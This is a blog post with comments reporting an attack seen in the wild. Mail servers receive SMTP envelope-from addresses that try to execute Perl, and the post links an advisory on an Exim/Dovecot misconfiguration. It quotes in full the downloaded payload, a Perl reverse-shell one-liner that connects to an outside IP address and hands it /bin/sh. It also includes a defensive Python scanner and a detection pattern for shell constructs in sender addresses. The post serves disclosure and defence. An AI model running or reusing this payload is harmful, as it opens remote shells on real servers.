SMTP: envelope-from address tries to execute perl

earlier today, found this:
(and someone else, too.)
of course, no one wants to execute the downloaded file a.pl:

perl -e 'use Socket;$i="178.218.211.118";$p=9000;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

not sure which MTA is vulnerable, yet.

…in the meantime i found RedTeam Pentesting GmbH has a detailed advisory on the problem: Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution - here
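
A defender-side check for this kind of envelope sender, added here as an example and not taken from the post or the advisory: it scans SMTP transcript lines for `MAIL FROM` addresses containing constructs a shell would act on. It assumes the MTA's SMTP conversation is available as text lines; the sample lines are constructed, and `CMD` and `VAR` are placeholders.

```python
import re

# Envelope sender as given in the SMTP MAIL command (RFC 5321), e.g. "MAIL FROM:<a@b>".
MAIL_FROM = re.compile(r"MAIL FROM:\s*<([^>]*)>", re.IGNORECASE)

# Constructs a POSIX shell acts on if the address reaches a command line unquoted.
# Backtick, "$", "{", "}" and "|" are legal in an address local-part, so the
# MTA's syntax check alone does not reject them. This is a heuristic.
SHELL_CONSTRUCTS = re.compile(r"`|\$\(|\$\{|;|\|")


def extract_sender(line):
    """Return the envelope sender from one SMTP transcript line, or None."""
    m = MAIL_FROM.search(line)
    return m.group(1) if m else None


def shell_constructs(address):
    """Return the distinct shell-meaningful constructs in an address, in order seen."""
    seen = []
    for tok in SHELL_CONSTRUCTS.findall(address):
        if tok not in seen:
            seen.append(tok)
    return seen


def scan(lines):
    """Return (line_number, sender, constructs) for every suspicious MAIL FROM."""
    hits = []
    for n, line in enumerate(lines, 1):
        sender = extract_sender(line)
        if sender is None:
            continue
        found = shell_constructs(sender)
        if found:
            hits.append((n, sender, found))
    return hits


# Constructed sample transcript lines (not from the post); CMD and VAR are placeholders.
SAMPLE = [
    "EHLO client.example.net",
    "MAIL FROM:<alice@example.com>",
    "MAIL FROM:<>",                                  # null sender (bounce)
    "MAIL FROM:<list+bob=example.org@example.com>",  # VERP-style, benign
    "mail from:<x`CMD${VAR}`y@example.com> SIZE=1024",
    "RCPT TO:<postmaster@example.com>",
]

if __name__ == "__main__":
    for n, sender, found in scan(SAMPLE):
        print(f"line {n}: {sender!r} contains {found}")
```

A hit is a reason to check whether the MTA passes the sender address to a delivery command through a shell, which is the misconfiguration the advisory describes.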


Comments:

Anonymous -

Any news on this? I received three of these yesterday on my LAMP webserver, this is the first attempt detected.

I searched on Google but I only found this blog entry.


iiegn -

RedTeam Pentesting GmbH has a detailed evaluation of the problem: Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution - here
